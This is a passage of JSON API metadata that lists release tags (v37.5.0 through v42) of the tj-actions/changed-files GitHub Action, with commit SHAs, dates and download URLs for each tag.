:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42/manifests"},{"name":"v42.0.0","sha":"ae82ed4ae04587b665efad2f206578aa6f0e8539","kind":"commit","published_at":"2024-01-18T04:57:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v42.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v42.0.0","dependencies_parsed_at":"2024-01-19T06:14:02.287Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v42.0.0/manifests"},{"name":"v41.1.2","sha":"cbda684547adc8c052d50711417fa61b428a9f88","kind":"commit","published_at":"2024-01-17T07:29:39.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41.1.2","dependencies_parsed_at":"2024-01-19T06:14:00.919Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.2/manifests"},{"name":"v41.1.1","sha":"62f4729b5df35e6e0e01265fa70a82ccaf196b4b","kind":"commit","published_at":"2024-01-13T21:53:17.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41.1.1","dependencies_parsed_at":"2024-01-19T06:14:02.125Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.1/manifests"},{"name":"v41.1.0","sha":"8e0194b29bc4bb6dd2338b6b7b915c56c2df6f58","kind":"commit","published_at":"2024-01-13T10:16:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41.1.0","dependencies_parsed_at":"2024-01-19T06:14:02.288Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.1.0/manifests"},{"name":"v41.0.1","sha":"716b1e13042866565e00e85fd4ec490e186c4a2f","kind":"commit","published_at":"2023-12-24T16:32:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41.0.1","dependencies_parsed_at":"2023-12-30T04:22:14.834Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.0.1/manifests"},{"name":"v41","sha":"716b1e13042866565e00e85fd4ec490e186c4a2f","kind":"commit","published_at":"2023-12-24T16:32:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41/manifests"},{"name":"v41.0.0","sha":"6e79d6e3dbe48946636c2939c80ff5c84ff7f9fe","kind":"commit","published_at":"2023-12-23T11:59:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v41.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v41.0.0","dependencies_parsed_at":"2023-12-28T04:14:05.580Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v41.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v41.0.0/manifests"},{"name":"v40.2.3","sha":"56284d80811fb5963a972b438f2870f175e5b7c8","kind":"commit","published_at":"2023-12-18T13:24:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.2.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.2.3","dependencies_parsed_at":"2023-12-21T04:07:28.766Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.3/manifests"},{"name":"v40.2.2","sha":"94549999469dbfa032becf298d95c87a14c34394","kind":"commit","published_at":"2023-12-10T07:14:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.2.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.2.2","dependencies_parsed_at":"2023-12-12T05:26:55.999Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.2/manifests"},{"name":"v40.2.1","sha":"1c938490c880156b746568a518594309cfb3f66b","kind":"commit","published_at":"2023-12-04T03:29:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.2.1","dependencies_parsed_at":"2023-12-05T04:11:16.708Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.1/manifests"},{"name":"v40.2.0","sha":"da093c1609db0edd0a037ce9664e135f74bf30d9","kind":"commit","published_at":"2023-11-27T08:36:29.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.2.0","dependencies_parsed_at":"2023-11-29T04:12:24.382Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.2.0/manifests"},{"name":"v40.1.1","sha":"25ef3926d147cd02fc7e931c1ef50772bbb0d25d","kind":"commit","published_at":"2023-11-08T00:43:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.1.1","dependencies_parsed_at":"2023-11-09T04:05:05.010Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.1.1/manifests"},{"name":"v40.1.0","sha":"18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b","kind":"commit","published_at":"2023-11-03T20:30:38.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.1.0","dependencies_parsed_at":"2023-11-09T04:04:45.582Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.1.0/manifests"},{"name":"v40.0.2","sha":"40526807ee1e208a1a8c1bbe6bd2d1b044ef6368","kind":"commit","published_at":"2023-10-31T18:39:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.0.2","dependencies_parsed_at":"2023-11-09T04:04:45.543Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.2/manifests"},{"name":"v40.0.1","sha":"bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438","kind":"commit","published_at":"2023-10-30T22:36:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.0.1","dependencies_parsed_at":"2023-11-09T04:04:46.147Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.1/manifests"},{"name":"v40.0.0","sha":"af292f1e845a0377b596972698a8598734eb2796","kind":"commit","published_at":"2023-10-26T04:01:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40.0.0","dependencies_parsed_at":"2023-11-09T04:04:45.744Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40.0.0/manifests"},{"name":"v40","sha":"af292f1e845a0377b596972698a8598734eb2796","kind":"commit","published_at":"2023-10-26T04:01:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v40","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v40/manifests"},{"name":"v39.2.4","sha":"fea790cb660e33aef4bdf07304e28fedd77dfa13","kind":"commit","published_at":"2023-10-23T18:01:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.2.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.2.4","dependencies_parsed_at":"2023-11-09T04:05:05.034Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.4/manifests"},{"name":"v39.2.3","sha":"95690f9ece77c1740f4a55b7f1de9023ed6b1f87","kind":"commit","published_at":"2023-10-17T01:48:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.2.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.2.3","dependencies_parsed_at":"2023-11-09T04:04:45.640Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.3/manifests"},{"name":"v39.2.2","sha":"408093d9ff9c134c33b974e0722ce06b9d6e8263","kind":"commit","published_at":"2023-10-11T13:03:43.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.2.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.2.2","dependencies_parsed_at":"2023-11-09T04:04:45.536Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.2/manifests"},{"name":"v39.2.1","sha":"db153baf731265ad02cd490b07f470e2d55e3345","kind":"commit","published_at":"2023-10-03T00:09:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.2.1","dependencies_parsed_at":"2023-11-09T04:04:45.720Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.1/manifests"},{"name":"v39.2.0","sha":"8238a4103220c636f2dad328ead8a7c8dbe316a3","kind":"commit","published_at":"2023-09-22T19:48:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.2.0","dependencies_parsed_at":"2023-11-09T04:04:46.146Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.2.0/manifests"},{"name":"v39.1.2","sha":"41960309398d165631f08c5df47a11147e14712b","kind":"commit","published_at":"2023-09-20T19:14:07.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.1.2","dependencies_parsed_at":"2023-11-09T04:04:45.641Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.2/manifests"},{"name":"v39.1.1","sha":"a21a533a0c244a27daac02f9dc6fcf8aeb996154","kind":"commit","published_at":"2023-09-19T20:21:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.1.1","dependencies_parsed_at":"2023-11-09T04:04:46.167Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.1/manifests"},{"name":"v39.1.0","sha":"8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d","kind":"commit","published_at":"2023-09-18T20:22:58.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.1.0","dependencies_parsed_at":"2023-11-09T04:05:05.002Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.1.0/manifests"},{"name":"v39.0.3","sha":"76c4d81a6acd339b55bd7407a016981c853eb702","kind":"commit","published_at":"2023-09-17T03:16:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.0.3","dependencies_parsed_at":"2023-11-09T04:04:45.770Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.3/manifests"},{"name":"v39.0.2","sha":"6ee9cdc5816333acda68e01cf12eedc619e28316","kind":"commit","published_at":"2023-09-11T19:21:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.0.2","dependencies_parsed_at":"2023-11-09T04:04:46.161Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.2/manifests"},{"name":"v39.0.1","sha":"246636f5fa148b5ad8e65ca4c57b18af3123e5f6","kind":"commit","published_at":"2023-09-09T03:02:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.0.1","dependencies_parsed_at":"2023-11-09T04:04:45.757Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.1/manifests"},{"name":"v39.0.0","sha":"48566bbcc22ceb7c5809ebdd27377309f2c3de8c","kind":"commit","published_at":"2023-09-04T21:29:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39.0.0","dependencies_parsed_at":"2023-11-09T04:05:05.008Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39.0.0/manifests"},{"name":"v39","sha":"48566bbcc22ceb7c5809ebdd27377309f2c3de8c","kind":"commit","published_at":"2023-09-04T21:29:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v39","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v39/manifests"},{"name":"v38.2.2","sha":"1aee3621b1c10305ee778298fcf32324684e5448","kind":"commit","published_at":"2023-09-04T20:19:43.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.2.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.2.2","dependencies_parsed_at":"2023-11-09T04:05:05.047Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.2/manifests"},{"name":"v38.2.1","sha":"2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a","kind":"commit","published_at":"2023-09-01T20:07:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.2.1","dependencies_parsed_at":"2023-11-09T04:04:45.774Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.1/manifests"},{"name":"v38.2.0","sha":"0fc9663aa70243d87319dbd32fd926344d18d38f","kind":"commit","published_at":"2023-08-30T21:10:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.2.0","dependencies_parsed_at":"2023-11-09T04:04:45.648Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.2.0/manifests"},{"name":"v38.1.3","sha":"c860b5c47fa71f461da850094ef2f6e3d6514e44","kind":"commit","published_at":"2023-08-26T20:32:03.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.1.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.1.3","dependencies_parsed_at":"2023-11-09T04:04:45.755Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.3/manifests"},{"name":"v38.1.2","sha":"2f8b80270f04e421b28efb2abaccef4fce4815b6","kind":"commit","published_at":"2023-08-26T20:08:40.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.1.2","dependencies_parsed_at":"2023-11-09T04:05:05.033Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.2/manifests"},{"name":"v38.1.1","sha":"b7f1b7347fea1df67230801b66081fe3cba7dc69","kind":"commit","published_at":"2023-08-25T20:29:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.1.1","dependencies_parsed_at":"2023-11-09T04:05:05.036Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.1/manifests"},{"name":"v38.1.0","sha":"1c26215f3fbd51eba03bc199e5cbabdfc3584ce3","kind":"commit","published_at":"2023-08-23T22:40:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.1.0","dependencies_parsed_at":"2023-11-09T04:05:04.997Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.1.0/manifests"},{"name":"v38.0.0","sha":"17f3fec1edef0c3916d59cbcee1585fcd457e456","kind":"commit","published_at":"2023-08-23T04:26:07.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38.0.0","dependencies_parsed_at":"2023-11-09T04:04:45.535Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38.0.0/manifests"},{"name":"v38","sha":"17f3fec1edef0c3916d59cbcee1585fcd457e456","kind":"commit","published_at":"2023-08-23T04:26:07.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v38","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v38/manifests"},{"name":"v37.6.1","sha":"a0585ff9904b77d046192a7846e59783d6ea287b","kind":"commit","published_at":"2023-08-15T17:37:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.6.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.6.1","dependencies_parsed_at":"2023-11-09T04:05:04.997Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.6.1/manifests"},{"name":"v37.6.0","sha":"87697c0dca7dd44e37a2b79a79489332556ff1f3","kind":"commit","published_at":"2023-08-07T06:05:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.6.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.6.0","dependencies_parsed_at":"2023-11-09T04:05:05.022Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.6.0/manifests"},{"name":"v37.5.2","sha":"85c8b8252fc9893e00b3633a16670e53040e6d71","kind":"commit","published_at":"2023-08-03T19:25:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.5.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.5.2","dependencies_parsed_at":"2023-11-09T04:04:45.775Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.2/manifests"},{"name":"v37.5.1","sha":"a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce","kind":"commit","published_at":"2023-07-28T19:34:23.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.5.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.5.1","dependencies_parsed_at":"2023-11-09T04:05:05.053Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.1/manifests"},{"name":"v37.5.0","sha":"920e7b9ae1d45913fc81f86c956fee89c77d2e5e","kind":"commit","published_at":"2023-07-24T22:25:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.5.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.5.0","dependencies_parsed_